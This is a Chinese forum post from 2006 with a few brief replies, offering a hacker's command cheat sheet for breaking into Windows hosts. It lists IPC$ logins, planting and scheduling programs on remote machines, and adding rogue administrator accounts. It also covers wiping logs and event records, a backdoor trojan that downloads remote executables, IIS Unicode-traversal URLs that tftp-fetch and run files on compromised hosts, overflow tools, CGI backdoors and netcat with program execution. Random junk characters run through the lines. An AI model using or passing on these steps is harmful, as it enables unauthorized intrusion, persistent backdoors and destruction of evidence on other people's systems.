社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 2823阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 |@5G\N-  
常用的几条NET命令: ]TVc 'G;  
G5hf m-  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" f cnv[B..{  
jr(|-!RVMN  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" KwNOB _  
0SR[)ma  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$  s2`}~  
-e O>d}  
(查看远程主机时间) net time \\IP地址 U1Y0G[i)  
L"RE[" m  
(定时启动某个程序) at \\IP地址 02:18 readme.exe O{x-9p  
^+w1:C5  
(查看共享) net view \\IP地址 v:"Y  
l} @C'Np  
(查看netbios工作组列表) nbtstat -A IP地址 3aw-fuuIb  
9^7z"*@#  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" 4k!>JQor  
WC Y5F  
(这两条把自己增加到管理员组): net user 用户名 密码 /add T 9FGuit9  
,]tEh:QC  
net localgroup Administrators 用户名 /add ;o158H$gz;  
[>LO'}%  
(断开连接) net use \\IP地址\ipc$ /delete iUbcvF3aP  
iD.p KG  
扫尾: cx[[K.  
xFcW%m>9C  
del C:\winnt\system32\logfiles\*.* ):\+%v^  
5?A<('2  
del C:\winnt\ssytem32\config\*.evt `(r0+Qx  
yU>ucuF  
del C:\winnt\system32\dtclog\*.* d*x&Uh[K  
.qLX jU  
del C:\winnt\system32\*.log Bk] `n'W  
[HhaBy9  
del C:\winnt\system32\*.txt u"MfxW`  
g_@b- :$Yq  
del C:\winnt\*.txt >>c%I c  
oT|:gih5  
del C:\winnt\*.log M< H+$}[  
'U,\5jj'Y  
一、netsvc.exe \!"3yd  
Wo  Z@  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: ]E.\ |I(  
{Y3:Y+2X3*  
netsvc /list \\IP地址 kZ;Y/DH  
IOa@dUh7a,  
netsvc schedule \\IP地址 /query OepQ Z|2  
Gzp*Vr  
netsvc \\IP地址 schedule /start  PZY6 I  
X/bu z  
二、OpenTelnet.exe tkmzOc H  
3e>U(ES  
远程启动主机的Telnet服务,并绑定端口到7878,例如: e~SRGyIww  
r)B55;*Fh  
OpenTelnet \\IP地址 用户名 密码 1 7878 v|dt[>G  
b'I@TLE')  
然后就可以telnet到主机的7878端口,进入DOS方式下: 3lbGG42:  
WD5jO9Oai  
telnet IP地址 7878 : )y3 &I  
b\t?5z-Z  
三、winshell.exe TEla?N  
^x Z=";eq  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: PzT@q\O  
--k!KrL  
p Path (查看winshell主程序的路径信息) :Dfl,=S  
1+ [,eq  
b reBoot (重新启动机器) `QZKW  
Tkn8W j  
d shutDown (关闭机器) .$1S-+(kV  
TrNh,5+b  
s Shell (执行后你就会看到可爱的“C:\>”) a]J>2A@-I  
l GJN;G7  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) -v:3#9uX)  
,kUg"\_k  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) ,4k3C#!. i  
@vL0gzE?nB  
四、3389登陆器,GUI方式登录远程主机的 |"[;0)dw^  
VtMnLF Mw  
五、elsave.exe cYvt!M\ed  
r?|(t?  
事件日志清除工具 g-H,*^g+  
W)^%/lAh  
elsave -s \\IP地址 -l "application" -C b~{nS,_Rn  
q,OCA\  
elsave -s \\IP地址 -l "system" -C *,)1Dcv(  
Od~ e*gA8  
elsave -s \\IP地址 -l "security" -C t. HwX9  
HdyE`FY\  
执行后成功清除应用程序日志,系统日志,安全日志 ]bbP_n8  
3NdO3-~)  
六、hbulot.exe ti3S'K0t  
}S4+1 U3  
开启win2kserver和winxp的3389服务 %L$ ?Mey  
i ~)V>x  
hbulot [/r] 4pZKm-dM^  
~+,ZD)AKi4  
使用/r表示安装完成后自动重起目标使设置生效。 Urol)_3X  
`)kxFD_bH  
七、nc.exe(netcat.exe) aiZZz1C   
7V5kYYR^F  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 ,Y16m{<eC  
#GfM^sK  
想要连接到某处: nc [-options] hostname port[s] [ports] ... 4hYK$!"r  
o}D }Q"=A  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 6W~JM^F  
X5-[v(/]  
参数: BqpJvRJd  
L=.@hs  
-e prog 程序重定向,一旦连接,就执行 [危险!!] I}|E_U1Qj  
9ph>4u(R  
-g gateway source-routing hop point[s], up to 8 (4IP&^j:\  
$@w ,9J\  
-G num source-routing pointer: 4, 8, 12, ... ^E)8Sb9t  
zn0%%x+!g  
-h 帮助信息 oTr,zRL  
e.Q'l/g  
-i secs 延时的间隔 %s;5  
s2F[v:|Wq  
-l 监听模式,用于入站连接 o5YL_=7m  
FE:} D ;$  
-n 指定数字的IP地址,不能用hostname yTNHM_P  
IsVR4t]  
-o file 记录16进制的传输 YS<KyTb"  
Hd TB[(  
-p port 本地端口号 b8[ ayy  
- ~*kAh  
-r 任意指定本地及远程端口 >.H}(!  
y5?kv-"c  
-s addr 本地源地址 {DE4PE`  
s=1k9   
-u UDP模式 "Y"`'U=v  
uz:r'+v  
-v 详细输出——用两个-v可得到更详细的内容 x7i,jMR  
|h&okR+_,  
-w secs timeout的时间 JUJrtK S  
di ]CYLf  
-z 将输入输出关掉——用于扫描时 bxWzm|  
八、TFTPD32.EXE K.Cx 9  
[#AI!-  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: _`Y%Y6O1/  
1c*:" k  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 twt's,dO  
P057]cAat<  
然后可以直接令文件运行: ;y)3/46S  
_bv9/#tR  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 z uo:yaO  
KI].T+I  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 !Q}Bz*Y  
+:/.\3v71  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 P%d3fFzK  
\Hq=_}]F  
一、一 Xscan命令行运行参数说明: A'D2uV  
p  S|  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 Xi~I<&  
w}M)]kY  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] K.}jyhKIKi  
Gs4t6+Al  
xscan -file <主机列表文件名> <检测项目> [其他选项] i&<@}:,  
WopA7J,  
其中<检测项目> 含义如下: Q91mCP~$  
9)n3f^,Oj*  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); QVmJ_WT  
8hMy$  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); ,,g: x  
YpG6p0 nd  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); 67||wh.BU  
umpa!q};  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); n" vO?8Sx  
YllW2g:  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); !G<gp4Js+N  
@lqI,Ce5  
[其他选项] 含义如下: `'9t^ 6mk  
cK IA.c}N  
-v: 显示详细扫描进度 n:}'f- :T  
*8/cd0  
-p: 跳过Ping不通的主机 l=a< =i  
> lI2r}  
-o: 跳过没有检测到开放端口的主机 /8,cF7XL*  
^a|  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 d:h X3  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
10+5=?,请输入中文答案:十五